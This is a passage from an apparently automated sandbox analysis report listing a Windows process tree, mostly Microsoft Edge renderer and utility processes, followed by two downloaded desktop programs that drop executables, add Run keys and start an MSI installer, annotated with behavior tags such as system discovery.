  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2068,14397539398983253078,18307226776382463090,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3916 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5860
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,14397539398983253078,18307226776382463090,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4244 /prefetch:1
  2⤵
  PID:5932
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,14397539398983253078,18307226776382463090,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4272 /prefetch:1
  2⤵
  PID:5940
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,14397539398983253078,18307226776382463090,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4012 /prefetch:1
  2⤵
  PID:6100
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,14397539398983253078,18307226776382463090,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5548 /prefetch:1
  2⤵
  PID:5452
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,14397539398983253078,18307226776382463090,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5452 /prefetch:1
  2⤵
  PID:5592
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,14397539398983253078,18307226776382463090,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5732 /prefetch:1
  2⤵
  PID:5536
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,14397539398983253078,18307226776382463090,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5744 /prefetch:1
  2⤵
  PID:5380
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,14397539398983253078,18307226776382463090,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5972 /prefetch:1
  2⤵
  PID:5968
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,14397539398983253078,18307226776382463090,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1952 /prefetch:1
  2⤵
  PID:4388
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,14397539398983253078,18307226776382463090,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2528 /prefetch:1
  2⤵
  PID:1520
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,14397539398983253078,18307226776382463090,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3076 /prefetch:1
  2⤵
  PID:5756
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2068,14397539398983253078,18307226776382463090,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=1692 /prefetch:8
  2⤵
  PID:2596
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,14397539398983253078,18307226776382463090,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5192 /prefetch:1
  2⤵
  PID:2632
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2068,14397539398983253078,18307226776382463090,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2456 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5040
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,14397539398983253078,18307226776382463090,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6152 /prefetch:1
  2⤵
  PID:2860
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,14397539398983253078,18307226776382463090,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6460 /prefetch:1
  2⤵
  PID:5124
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,14397539398983253078,18307226776382463090,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6700 /prefetch:1
  2⤵
  PID:1740
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,14397539398983253078,18307226776382463090,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5212 /prefetch:1
  2⤵
  PID:1000
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,14397539398983253078,18307226776382463090,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7068 /prefetch:1
  2⤵
  PID:5224
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,14397539398983253078,18307226776382463090,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6828 /prefetch:1
  2⤵
  PID:2672
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,14397539398983253078,18307226776382463090,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5664 /prefetch:1
  2⤵
  PID:4104
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,14397539398983253078,18307226776382463090,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6848 /prefetch:1
  2⤵
  PID:5704
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,14397539398983253078,18307226776382463090,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7204 /prefetch:1
  2⤵
  PID:3652
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,14397539398983253078,18307226776382463090,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6500 /prefetch:1
  2⤵
  PID:5484
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,14397539398983253078,18307226776382463090,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8152 /prefetch:1
  2⤵
  PID:1020
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2068,14397539398983253078,18307226776382463090,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7944 /prefetch:8
  2⤵
  PID:2016
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,14397539398983253078,18307226776382463090,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6232 /prefetch:1
  2⤵
  PID:4980
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,14397539398983253078,18307226776382463090,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6256 /prefetch:1
  2⤵
  PID:5108
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,14397539398983253078,18307226776382463090,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7048 /prefetch:1
  2⤵
  PID:5840
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,14397539398983253078,18307226776382463090,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7316 /prefetch:1
  2⤵
  PID:5392
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,14397539398983253078,18307226776382463090,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6516 /prefetch:1
  2⤵
  PID:2304
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,14397539398983253078,18307226776382463090,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7660 /prefetch:1
  2⤵
  PID:2392
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,14397539398983253078,18307226776382463090,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=7908 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4440
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,14397539398983253078,18307226776382463090,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7712 /prefetch:1
  2⤵
  PID:5836
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2068,14397539398983253078,18307226776382463090,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7692 /prefetch:8
  2⤵
  PID:516
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,14397539398983253078,18307226776382463090,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3972 /prefetch:1
  2⤵
  PID:1336
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,14397539398983253078,18307226776382463090,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3916 /prefetch:1
  2⤵
  PID:4588
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,14397539398983253078,18307226776382463090,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7800 /prefetch:1
  2⤵
  PID:2348
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,14397539398983253078,18307226776382463090,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7304 /prefetch:1
  2⤵
  PID:5920
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2068,14397539398983253078,18307226776382463090,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6804 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5316
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,14397539398983253078,18307226776382463090,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6156 /prefetch:1
  2⤵
  PID:2868
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,14397539398983253078,18307226776382463090,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7540 /prefetch:1
  2⤵
  PID:1740
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,14397539398983253078,18307226776382463090,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6448 /prefetch:1
  2⤵
  PID:3992
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,14397539398983253078,18307226776382463090,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8284 /prefetch:1
  2⤵
  PID:1764
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,14397539398983253078,18307226776382463090,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8368 /prefetch:1
  2⤵
  PID:5492
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,14397539398983253078,18307226776382463090,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7556 /prefetch:1
  2⤵
  PID:1932
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,14397539398983253078,18307226776382463090,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8380 /prefetch:1
  2⤵
  PID:5048
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,14397539398983253078,18307226776382463090,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8748 /prefetch:1
  2⤵
  PID:6136
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,14397539398983253078,18307226776382463090,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8276 /prefetch:1
  2⤵
  PID:1712
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,14397539398983253078,18307226776382463090,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8664 /prefetch:1
  2⤵
  PID:2220
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,14397539398983253078,18307226776382463090,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8268 /prefetch:1
  2⤵
  PID:2348
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2068,14397539398983253078,18307226776382463090,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7556 /prefetch:8
  2⤵
  PID:4928
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2068,14397539398983253078,18307226776382463090,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8284 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:232
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2068,14397539398983253078,18307226776382463090,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8260 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3624
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2068,14397539398983253078,18307226776382463090,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7144 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3900
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,14397539398983253078,18307226776382463090,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8528 /prefetch:1
  2⤵
  PID:2020
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,14397539398983253078,18307226776382463090,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8288 /prefetch:1
  2⤵
  PID:2468
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,14397539398983253078,18307226776382463090,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8360 /prefetch:1
  2⤵
  PID:2720
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,14397539398983253078,18307226776382463090,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7144 /prefetch:1
  2⤵
  PID:5100
- C:\Users\Admin\Downloads\butterflyondesktop.exe
  "C:\Users\Admin\Downloads\butterflyondesktop.exe"
  2⤵
  - Executes dropped EXE
  PID:5608
- - C:\Users\Admin\AppData\Local\Temp\is-5TQP0.tmp\butterflyondesktop.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-5TQP0.tmp\butterflyondesktop.tmp" /SL5="$50350,2719719,54272,C:\Users\Admin\Downloads\butterflyondesktop.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Drops file in Program Files directory
    - System Location Discovery: System Language Discovery
    PID:4788
  - - C:\Program Files (x86)\Butterfly on Desktop\ButterflyOnDesktop.exe
      "C:\Program Files (x86)\Butterfly on Desktop\ButterflyOnDesktop.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      Suspicious use of SendNotifyMessage
      PID:3620
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://freedesktopsoft.com/butterflyondesktoplike.html
      4⤵
      PID:2216
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffa90c646f8,0x7ffa90c64708,0x7ffa90c64718
        5⤵
        
        PID:5728
- C:\Users\Admin\Downloads\myfriendpingu.exe
  "C:\Users\Admin\Downloads\myfriendpingu.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:2020
- - C:\Windows\SysWOW64\MSIEXEC.EXE
    MSIEXEC.EXE /i "C:\Users\Admin\AppData\Local\Temp\_is49D3\My Friend Pingu.msi"
    3⤵
    - Enumerates connected drives
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:5284
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
